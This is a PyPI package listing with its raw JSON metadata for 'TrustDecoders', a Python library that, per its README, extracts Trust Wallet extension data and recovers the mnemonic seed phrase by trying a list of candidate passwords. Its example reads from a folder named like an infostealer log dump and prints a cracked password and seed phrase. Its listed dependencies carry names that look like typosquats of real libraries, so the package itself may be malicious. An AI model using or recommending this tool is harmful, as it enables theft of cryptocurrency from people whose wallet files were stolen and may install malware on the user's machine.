TrustDecoders


NameTrustDecoders JSON
Version 1.9.5 PyPI version JSON
download
home_pageNone
SummarySimple Tools for decode Trust wallet data, from extensions wallet, TrustWallet.
upload_time2024-09-21 22:19:39
maintainerNone
docs_urlNone
authorIsaac Florentine
requires_python<4.0,>=3.7
licenseMIT
keywords extensions trustwallet walletdecode trust evm crypto decrypt wallet
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # TrustDecoders
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)

Simple Tools for decode Trust wallet data, from extensions wallet, TrustWallet. - extract mnemonic phrase from you encrypted data with password.


## Installation
Install the dependencies and devDependencies and start the server.
**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.

###### python -m pip install --upgrade pip

or u can install per one libs:
```sh
pip install pycryptodome	| pycryptodome 3.20.0
pip install Cipherbcryptor	| Cipherbcryptor 1.2
pip install ccl_leveldbase	| ccl-leveldbase 1.2
```


## Example

```python
from TrustDecoders import extractWallets, trstDecode

data = extractWallets(r'C:/Users/Root/Desktop/Logs/wLogs/Wallet/Trust Wallet_Chrome_Default')
www = trstDecode(data, ["asdsadsadasdasd", "sadsadsa334fsd", "sda3246gfhjdgfkj", "orihj8dydgf", "12345677Iqbol@"])
print(www)
```
### Output:
```json
{'status': True, 'txt': 'Successful', 'pwd': '12345677Iqbol@', 'data': ['cupboard banner crumble power height despair pass off word input surface stay']}
```


For more information, see [docs.python-guide.org](http://docs.python-guide.org "docs.python-guide.org").



## License
MIT
>Decoder master project (c)

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "TrustDecoders",
    "maintainer": null,
    "docs_url": null,
    "requires_python": "<4.0,>=3.7",
    "maintainer_email": null,
    "keywords": "extensions, TrustWallet, walletdecode, Trust, evm, crypto, decrypt, wallet",
    "author": "Isaac Florentine",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/3b/2d/005a22642091a171158cbf31ac32d21954913543168f31c1426e1e1381d1/trustdecoders-1.9.5.tar.gz",
    "platform": null,
    "description": "# TrustDecoders\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nSimple Tools for decode Trust wallet data, from extensions wallet, TrustWallet. - extract mnemonic phrase from you encrypted data with password.\n\n\n## Installation\nInstall the dependencies and devDependencies and start the server.\n**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.\n\n###### python -m pip install --upgrade pip\n\nor u can install per one libs:\n```sh\npip install pycryptodome\t| pycryptodome 3.20.0\npip install Cipherbcryptor\t| Cipherbcryptor 1.2\npip install ccl_leveldbase\t| ccl-leveldbase 1.2\n```\n\n\n## Example\n\n```python\nfrom TrustDecoders import extractWallets, trstDecode\n\ndata = extractWallets(r'C:/Users/Root/Desktop/Logs/wLogs/Wallet/Trust Wallet_Chrome_Default')\nwww = trstDecode(data, [\"asdsadsadasdasd\", \"sadsadsa334fsd\", \"sda3246gfhjdgfkj\", \"orihj8dydgf\", \"12345677Iqbol@\"])\nprint(www)\n```\n### Output:\n```json\n{'status': True, 'txt': 'Successful', 'pwd': '12345677Iqbol@', 'data': ['cupboard banner crumble power height despair pass off word input surface stay']}\n```\n\n\nFor more information, see [docs.python-guide.org](http://docs.python-guide.org \"docs.python-guide.org\").\n\n\n\n## License\nMIT\n>Decoder master project (c)\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Simple Tools for decode Trust wallet data, from extensions wallet, TrustWallet.",
    "version": "1.9.5",
    "project_urls": null,
    "split_keywords": [
        "extensions",
        " trustwallet",
        " walletdecode",
        " trust",
        " evm",
        " crypto",
        " decrypt",
        " wallet"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "b3c8fc7bfe661882d183fc598627341af4d18e97b35f6b891e77a378d0078606",
                "md5": "2f43b486311780100e78d57ce94e4d7d",
                "sha256": "0a43d4e34d6dcebfd477cf28c2382bf95623c5f28ba89f53876888d7913a1953"
            },
            "downloads": -1,
            "filename": "trustdecoders-1.9.5-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "2f43b486311780100e78d57ce94e4d7d",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": "<4.0,>=3.7",
            "size": 4183,
            "upload_time": "2024-09-21T22:19:38",
            "upload_time_iso_8601": "2024-09-21T22:19:38.917888Z",
            "url": "https://files.pythonhosted.org/packages/b3/c8/fc7bfe661882d183fc598627341af4d18e97b35f6b891e77a378d0078606/trustdecoders-1.9.5-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "3b2d005a22642091a171158cbf31ac32d21954913543168f31c1426e1e1381d1",
                "md5": "94a28e62822f470357748aa2d47be668",
                "sha256": "87237c8d8dddf75249ae685ed561105c98e7c78450475653257dcedeb9a3b803"
            },
            "downloads": -1,
            "filename": "trustdecoders-1.9.5.tar.gz",
            "has_sig": false,
            "md5_digest": "94a28e62822f470357748aa2d47be668",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": "<4.0,>=3.7",
            "size": 3865,
            "upload_time": "2024-09-21T22:19:39",
            "upload_time_iso_8601": "2024-09-21T22:19:39.970284Z",
            "url": "https://files.pythonhosted.org/packages/3b/2d/005a22642091a171158cbf31ac32d21954913543168f31c1426e1e1381d1/trustdecoders-1.9.5.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-09-21 22:19:39",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "trustdecoders"
}
        
Elapsed time: 0.38651s